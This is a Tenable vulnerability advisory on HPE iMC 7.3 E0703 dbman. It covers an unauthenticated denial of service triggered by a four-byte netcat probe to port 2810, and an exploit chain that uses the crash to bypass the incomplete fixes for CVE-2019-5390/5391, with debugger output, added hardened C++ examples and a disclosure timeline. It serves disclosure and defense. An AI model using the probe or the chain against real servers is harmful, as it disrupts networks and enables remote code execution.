
HPE iMC 7.3 E0703 Multiple Vulnerabilities

Critical

Synopsis

Unauthenticated Remote Denial of Service (DoS)

The flaw exists in the CDataConnStreamQueueT::deal_msg method in dbman.exe, where the C++ new[] operator is used to allocate memory with an allocation size taken directly from the attacker's request:

.text:0045AD95      mov     eax, dword ptr [ebp+var_first4bytes]; attacker-controlled
.text:0045AD98      add     eax, 1
.text:0045AD9B      push    eax                        ; unsigned int
.text:0045AD9C      call    ??_U@YAPAXI@Z              ; operator new[](uint)

The attacker can specify a very large allocation size by sending the following 4-byte message to dbman on port 2810. The bytes ff ff ff 00 become a length of 0xffffff00, so after the add operator new[] is asked for 0xffffff01 bytes, the first argument visible in frame 02 of the stack trace below:

echo -ne '\xff\xff\xff\x00' | nc  2810

The allocation fails and operator new throws std::bad_alloc (C++ EH exception code e06d7363):

0:005> g
(1b0c.1ab4): C++ EH exception - code e06d7363 (first chance)
(1b0c.1ab4): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=0257d7c8 ebx=00000021 ecx=00000003 edx=00000000 esi=7448c164 edi=00000218
eip=7629c1a2 esp=0257d7c8 ebp=0257d824 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
KERNELBASE!RaiseException+0x62:
7629c1a2 8b4c2454        mov     ecx,dword ptr [esp+54h] ss:002b:0257d81c=339b14f7
0:001> kb
 # ChildEBP RetAddr  Args to Child              
00 0257d824 7444df60 e06d7363 00000001 00000003 KERNELBASE!RaiseException+0x62
01 0257d85c 74453efd 0257d86c 7447d604 743f2a10 MSVCR90!_CxxThrowException+0x48 [f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\throw.cpp @ 161] 
02 0257d878 0045ada1 ffffff01 45e63853 00000000 MSVCR90!operator new+0x64 [f:\dd\vctools\crt_bld\self_x86\crt\src\new.cpp @ 63] 
WARNING: Stack unwind information not available. Following frames may be wrong.
03 0257fd38 00461415 02320628 02320628 004c7144 dbman+0x5ada1
04 0257fd4c 70e7c3c9 00000218 00000054 00000000 dbman+0x61415

The exception is not handled anywhere in dbman (it reaches the second chance unhandled), so the process terminates. No authentication is needed; a single 4-byte message is enough.
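The allocation pattern from the disassembly beside a hardened version of the same handler, as an added C++ example; this is not dbman's code and not from the advisory. It assumes the length is read big-endian (the only reading under which the probe bytes above become the 0xffffff01 argument in the operator new frame), and kMaxMsgLen is an assumed ceiling. The real dbman framing beyond the first four bytes is not described on this page, and the wrap of 0xffffffff + 1 to zero shown in the model is a property of the model, not something the advisory reports against dbman.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <memory>
#include <new>
#include <string>

// Added example, not dbman's code. It models the pattern the disassembly shows
// (a 32-bit value taken from the first four request bytes, incremented, passed
// straight to operator new[]) beside a hardened version of the same handler.
// Assumption, not stated in the advisory: the length is read big-endian. That
// is what turns the probe bytes ff ff ff 00 into the 0xffffff01 argument seen
// in the operator new frame of the crash dump.
uint32_t read_be32(const unsigned char *p) {
    return (uint32_t(p[0]) << 24) | (uint32_t(p[1]) << 16) |
           (uint32_t(p[2]) << 8) | uint32_t(p[3]);
}

// Size the vulnerable code hands to operator new[]: attacker value + 1, done in
// 32 bits as in the 32-bit dbman.exe.
//   0xffffff00 -> 0xffffff01: the allocation fails and std::bad_alloc propagates
//   0xffffffff -> 0x00000000: the sum wraps (a property of this model; the
//                advisory does not report that case against dbman)
uint32_t vulnerable_alloc_size(uint32_t attacker_len) {
    return attacker_len + 1;
}

// Vulnerable handler: no ceiling on the length and no catch for bad_alloc, so
// a huge length throws out of deal_msg and, as in dbman, ends the process.
std::string deal_msg_vulnerable(const unsigned char *msg, size_t msg_len) {
    if (msg_len < 4) return std::string();
    uint32_t n = read_be32(msg);
    unsigned char *buf = new unsigned char[vulnerable_alloc_size(n)]; // may throw
    size_t avail = msg_len - 4;
    size_t take = n < avail ? n : avail;
    std::memcpy(buf, msg + 4, take);
    std::string body(reinterpret_cast<const char *>(buf), take);
    delete[] buf;
    return body;
}

// Hardened handler. kMaxMsgLen is an assumed ceiling; use whatever the real
// protocol needs. The declared length is checked against the bytes that
// actually arrived, the size computation cannot wrap, and an allocation
// failure becomes a rejected message instead of an unhandled exception.
constexpr size_t kMaxMsgLen = 64 * 1024;

enum class Status { Ok, TooShort, TooLarge, Truncated, OutOfMemory };
struct Result { Status status; std::string body; };

Result deal_msg_hardened(const unsigned char *msg, size_t msg_len) {
    if (msg_len < 4) return {Status::TooShort, ""};
    uint32_t n = read_be32(msg);
    if (n > kMaxMsgLen) return {Status::TooLarge, ""};   // rejects 0xffffff00 and 0xffffffff
    if (n > msg_len - 4) return {Status::Truncated, ""}; // declared length vs. bytes present
    std::unique_ptr<unsigned char[]> buf;
    try {
        buf.reset(new unsigned char[static_cast<size_t>(n) + 1]); // n <= kMaxMsgLen, no wrap
    } catch (const std::bad_alloc &) {
        return {Status::OutOfMemory, ""};
    }
    std::memcpy(buf.get(), msg + 4, n);
    buf[n] = 0;
    return {Status::Ok, std::string(reinterpret_cast<const char *>(buf.get()), n)};
}

// Constructed inputs: the advisory's probe (echo -ne '\xff\xff\xff\x00'), a
// benign frame (length 5 + "hello"), and a frame whose declared length exceeds
// the bytes that arrived.
const unsigned char kProbe[4] = {0xff, 0xff, 0xff, 0x00};
const unsigned char kGoodFrame[] = {0, 0, 0, 5, 'h', 'e', 'l', 'l', 'o'};
const unsigned char kTruncatedFrame[] = {0, 0, 0, 16, 'a', 'b', 'c'};

int main() {
    std::printf("probe length 0x%08x -> new[](0x%08x)\n", read_be32(kProbe),
                vulnerable_alloc_size(read_be32(kProbe)));
    Result r = deal_msg_hardened(kProbe, sizeof kProbe);
    std::printf("hardened(probe): status=%d\n", int(r.status));
    r = deal_msg_hardened(kGoodFrame, sizeof kGoodFrame);
    std::printf("hardened(good): status=%d body=%s\n", int(r.status), r.body.c_str());
    std::printf("vulnerable(good): body=%s\n",
                deal_msg_vulnerable(kGoodFrame, sizeof kGoodFrame).c_str());
    return 0;
}
```

The hardened version never calls deal_msg_vulnerable with the probe: on a 64-bit host with overcommit a 4 GB new[] can succeed, so the throw the advisory shows is only reliable on the 32-bit dbman.exe. The length ceiling is what makes the outcome deterministic, and the try/catch is the backstop for the allocation failures the ceiling cannot rule out.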

Incomplete Fixes for CVE-2019-5390 and CVE-2019-5391

The root causes of these vulnerabilities were not addressed in 7.3 E0703.

In the exploitation scenarios for those CVEs, the attacker first sends command 10018 (which injects variables into dbman.conf) followed by command 10000 (which makes dbman reload dbman.conf). That sequence is enough to trigger the stack buffer overflow. The command injection additionally requires command 10002, which triggers a backup.

HPE iMC 7.3 E0703 changed dbman to require commands 10000 and 10002 to be encrypted, while command 10018 is still accepted unencrypted. The attacker can therefore still inject configuration variables into dbman.conf with command 10018, but can no longer send commands 10000 or 10002 without the encryption key.

However, the attacker can use the DoS described above to kill the dbman process and force a restart. In testing, dbman is restarted automatically by imcsysdm.exe when the Intelligent Deployment Monitoring Agent is running, which is a likely production configuration. When dbman restarts and reads the modified dbman.conf containing an over-long BackHoseIp value, the stack buffer overflow occurs, so the reload that command 10000 used to provide is no longer needed. Likewise, the BackupTime and BackupTimeMinute variables can be set in the same 10018 request to schedule an automated backup, which takes the place of command 10002 and is enough to trigger the command injection.

WinDbg output:

STATUS_STACK_BUFFER_OVERRUN encountered
(990.123c): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for dbman.exe - 
eax=00000000 ebx=00000001 ecx=76275108 edx=0000002b esi=00000000 edi=00000000
eip=7631d74a esp=0019a32c ebp=0019a3b4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
KERNELBASE!UnhandledExceptionFilter+0x5a:
7631d74a cc              int     3
0:000> kb 
 # ChildEBP RetAddr  Args to Child              
00 0019a3b4 004a9859 004cb258 721993ca 8de66c35 KERNELBASE!UnhandledExceptionFilter+0x5a
WARNING: Stack unwind information not available. Following frames may be wrong.
01 0019a6e8 0044dabb 0019a97c 0019a97c 0019a998 dbman!std::_Init_locks::operator=+0xcd1
02 0019b068 41414141 41414141 41414141 41414141 dbman+0x4dabb
03 0019b06c 41414141 41414141 41414141 41414141 0x41414141
04 0019b070 41414141 41414141 41414141 41414141 0x41414141
...

The !exploitable WinDbg extension classifies the crash as exploitable. STATUS_STACK_BUFFER_OVERRUN means the /GS cookie check fired, so the overrun was caught before the function returned, but the 0x41414141 values in frames 02 through 04 show that saved frame pointers and return addresses were overwritten with data from the configuration value, and the tool's title reports that the corruption reached the exception handler chain as well:

0:000> .load msec.dll
0:000> !exploitable

!exploitable 1.6.0.0
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at KERNELBASE!UnhandledExceptionFilter+0x000000000000005a (Hash=0xdaf335ab.0xf6a1be01)

Corruption of the exception handler chain is considered exploitable
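The BackHoseIp overflow pattern beside a validating loader for the three dbman.conf variables named above, as an added C++ example; this is not dbman's code and not from the advisory. Assumptions, none of which the page states: dbman.conf is a file of Key=Value lines, BackHoseIp is an IPv4 literal (if the real field accepts hostnames, bound the length instead), the vulnerable loader's local buffer is 16 bytes, and BackupTime and BackupTimeMinute are an hour and a minute.

```cpp
#include <cstdio>
#include <cstring>
#include <map>
#include <string>

// Added example, not dbman's code. Assumed: dbman.conf is Key=Value lines,
// BackHoseIp is an IPv4 literal, and the vulnerable loader copies it into a
// 16-byte local buffer (the size is made up; the advisory shows only that the
// saved return addresses end up as 0x41414141).

// Parse Key=Value lines into a map; blank lines and '#' comments are skipped.
std::map<std::string, std::string> parse_conf(const std::string &text) {
    std::map<std::string, std::string> kv;
    size_t pos = 0;
    while (pos < text.size()) {
        size_t nl = text.find('\n', pos);
        if (nl == std::string::npos) nl = text.size();
        std::string line = text.substr(pos, nl - pos);
        pos = nl + 1;
        if (line.empty() || line[0] == '#') continue;
        size_t eq = line.find('=');
        if (eq != std::string::npos) kv[line.substr(0, eq)] = line.substr(eq + 1);
    }
    return kv;
}

// Vulnerable pattern: unbounded copy of a config value into a fixed stack
// buffer. A value longer than 15 bytes writes past ip[] (undefined behaviour),
// which is why main() and the test only ever pass a short value here.
size_t apply_back_hose_ip_vulnerable(const char *value) {
    char ip[16];
    std::strcpy(ip, value);   // no length check: the BackHoseIp overflow pattern
    return std::strlen(ip);
}

// Hardened: accept only a dotted-quad IPv4 literal, which bounds the value at
// 15 characters before anything is copied anywhere.
bool is_ipv4_literal(const std::string &s) {
    if (s.size() > 15) return false;
    int octets = 0;
    for (size_t i = 0; i < s.size(); ++octets) {
        size_t start = i;
        int v = 0;
        for (; i < s.size() && s[i] >= '0' && s[i] <= '9' && v <= 255; ++i) v = v * 10 + (s[i] - '0');
        if (i == start || v > 255) return false;
        if (i < s.size() && (s[i++] != '.' || i == s.size())) return false; // '.' must be followed by digits
    }
    return octets == 4;
}

// Parse a decimal integer and require lo <= value <= hi; rejects "" and "7x".
bool parse_int_in_range(const std::string &s, int lo, int hi, int &out) {
    if (s.empty() || s.size() > 3) return false;
    int v = 0;
    for (char c : s) { if (c < '0' || c > '9') return false; v = v * 10 + (c - '0'); }
    if (v < lo || v > hi) return false;
    out = v;
    return true;
}

struct BackupSettings {
    bool ok;                 // false: the file was rejected and nothing was applied
    char back_hose_ip[16];
    int backup_time;         // hour 0..23 and minute 0..59 (assumed meanings)
    int backup_time_minute;
};

// Load the three variables the advisory names. Any bad value rejects the whole
// file, so a restart with a poisoned dbman.conf fails closed instead of
// copying an over-long BackHoseIp onto the stack.
BackupSettings load_backup_settings(const std::string &conf_text) {
    BackupSettings out{};
    auto kv = parse_conf(conf_text);
    auto ip = kv.find("BackHoseIp");
    auto t = kv.find("BackupTime");
    auto m = kv.find("BackupTimeMinute");
    if (ip == kv.end() || t == kv.end() || m == kv.end()) return out;
    if (!is_ipv4_literal(ip->second)) return out;
    std::memcpy(out.back_hose_ip, ip->second.c_str(), ip->second.size() + 1); // <= 16 bytes
    if (!parse_int_in_range(t->second, 0, 23, out.backup_time)) return out;
    if (!parse_int_in_range(m->second, 0, 59, out.backup_time_minute)) return out;
    out.ok = true;
    return out;
}

// Constructed inputs: a sane file and one carrying an injected 200-byte BackHoseIp.
const std::string kGoodConf = "BackHoseIp=10.0.0.5\nBackupTime=2\nBackupTimeMinute=30\n";
const std::string kPoisonedConf =
    "BackHoseIp=" + std::string(200, 'A') + "\nBackupTime=2\nBackupTimeMinute=30\n";

int main() {
    BackupSettings good = load_backup_settings(kGoodConf);
    std::printf("good: ok=%d ip=%s at %02d:%02d\n", good.ok, good.back_hose_ip,
                good.backup_time, good.backup_time_minute);
    std::printf("poisoned: ok=%d\n", load_backup_settings(kPoisonedConf).ok);
    std::printf("vulnerable copy of a short value: %zu bytes\n",
                apply_back_hose_ip_vulnerable("10.0.0.5"));
    return 0;
}
```

The validation happens on the string before any copy, so the fixed buffer is never the thing enforcing the limit. Rejecting the whole file rather than a single key also matters here: a loader that skipped the bad BackHoseIp but still honoured BackupTime and BackupTimeMinute would keep the scheduled-backup half of the chain alive.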

Solution

Upgrade to iMC 7.3 E0705P02

Disclosure Timeline

06/05/2019 - Vulnerabilities discovered.
06/11/2019 - Vulnerabilities disclosed to HPE security. 90-day date is 09/09/2019.
06/14/2019 - HPE replies with an encrypted message. Tenable can't decrypt it, and sends HPE their public key.
06/18/2019 - Tenable's PGP key expired 6/17. Sends updated key to HPE.
06/21/2019 - HPE says the wrong key was used to encrypt the original disclosure. They will resend their key. Additionally, they can't import our key.
06/24/2019 - Tenable resends PGP public key and asks for HPE's key.
06/25/2019 - HPE sends a new key.
06/25/2019 - Tenable sends the original disclosure using the new key.
06/26/2019 - HPE says they sent us the wrong key. Sends another key and asks us to use that one moving forward.
06/26/2019 - Tenable acknowledges. Asks if we need to resend the report using the new key.
06/26/2019 - HPE asks to resend with new key.
06/26/2019 - Tenable resends with new key.
06/27/2019 - HPE assigns case number PSRT110957 and will let us know the action plan.
07/16/2019 - Tenable asks for an update.
07/30/2019 - Tenable asks for an update.
08/02/2019 - HPE does not have a target release date yet.
08/26/2019 - Tenable asks for an update.
09/03/2019 - As a professional courtesy, Tenable will extend the disclosure date by 2 weeks. The new disclosure date is 09/23/2019.
09/17/2019 - Tenable asks if HPE has received our communications. Reminds HPE that disclosure date is less than a week away.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2019-42
CVSSv2 Base / Temporal Score: 10.0 / 9.0
CVSSv2 Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Affected Products: HPE iMC 7.3 E0703
Risk Factor: Critical

Advisory Timeline

09/25/2019 - Initial release
01/03/2020 - Adding link to E0705 release notes
02/21/2020 - Adding link to E0705P02 release notes. Updated solution per HPE's guidance.
